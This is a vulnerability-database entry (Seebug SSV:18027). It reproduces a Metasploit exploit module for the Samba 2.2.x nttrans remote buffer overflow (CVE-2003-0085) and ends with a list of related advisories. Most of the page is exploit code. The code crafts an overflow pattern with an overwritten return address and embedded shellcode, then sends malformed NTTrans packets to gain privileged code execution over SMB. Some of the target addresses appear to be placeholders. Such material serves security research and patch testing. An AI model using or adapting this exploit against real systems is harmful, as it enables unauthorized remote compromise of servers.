Lucene search
RootSSV:18027HistoryApr 07, 2003 - 12:00 a.m.
Samba 2.2.x nttrans Overflow
2003-04-0700:00:00
Root
www.seebug.org
14
No description provided by source.
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba nttrans Overflow',
'Description' => %q{
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0085' ],
[ 'OSVDB', '6323' ],
[ 'BID', '7106' ],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
["Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
# 0x081fc968
pattern = Rex::Text.pattern_create(12000)
pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded
# 0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end
Related
canvas
canvas
Immunity Canvas: SAMBA_NTTRANS
2003-03-31 05:00:00
exploitdb
exploitdb
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)
2003-04-07 00:00:00
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)
2010-04-28 00:00:00
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow
2003-03-15 00:00:00
openvas
openvas
Samba 2.2.2 <= 2.2.6 Vulnerability (CVE-2003-0085)
2021-09-24 00:00:00
Debian Security Advisory DSA 262-1 (samba)
2008-01-17 00:00:00
Debian Security Advisory DSA 262-1 (samba)
2008-01-17 00:00:00
debiancve
debiancve
CVE-2003-0085
2003-03-31 05:00:00
nessus
nessus
Samba TNG < 0.3.1 Multiple Remote Vulnerabilities
2003-03-22 00:00:00
Debian DSA-262-1 : samba - remote exploit
2004-09-29 00:00:00
Samba < 2.2.8 Multiple Vulnerabilities
2003-03-15 00:00:00
cvelist
cvelist
CVE-2003-0085
2003-03-18 05:00:00
cve
cve
CVE-2003-0085
2003-03-31 05:00:00
packetstorm
packetstorm
Samba nttrans Overflow
2009-10-28 00:00:00
nvd
nvd
CVE-2003-0085
2003-03-31 05:00:00
securityvulns
securityvulns
Samba-TNG 0.3.1 Security Release (fwd)
2003-03-24 00:00:00
[SECURITY] [DSA-262-1] samba security fix
2003-03-16 00:00:00
suse
suse
remote command execution in samba, samba-client
2003-03-19 12:06:10
remote command execution in samba, samba-client
2003-03-19 11:29:42
osv
osv
samba - remote exploit
2003-03-15 00:00:00
redhat
redhat
(RHSA-2003:096) samba security update
2003-03-20 00:00:00
cert
cert
Samba contains multiple buffer overflows
2003-04-10 00:00:00
Samba contains a remotely exploitable stack buffer overflow
2002-12-13 00:00:00
Samba contains buffer overflow in SMB/CIFS packet fragment reassembly code
2003-03-17 00:00:00
debian
debian
[SECURITY] [DSA-262-1] samba security fix
2003-03-15 16:42:48
Related for SSV:18027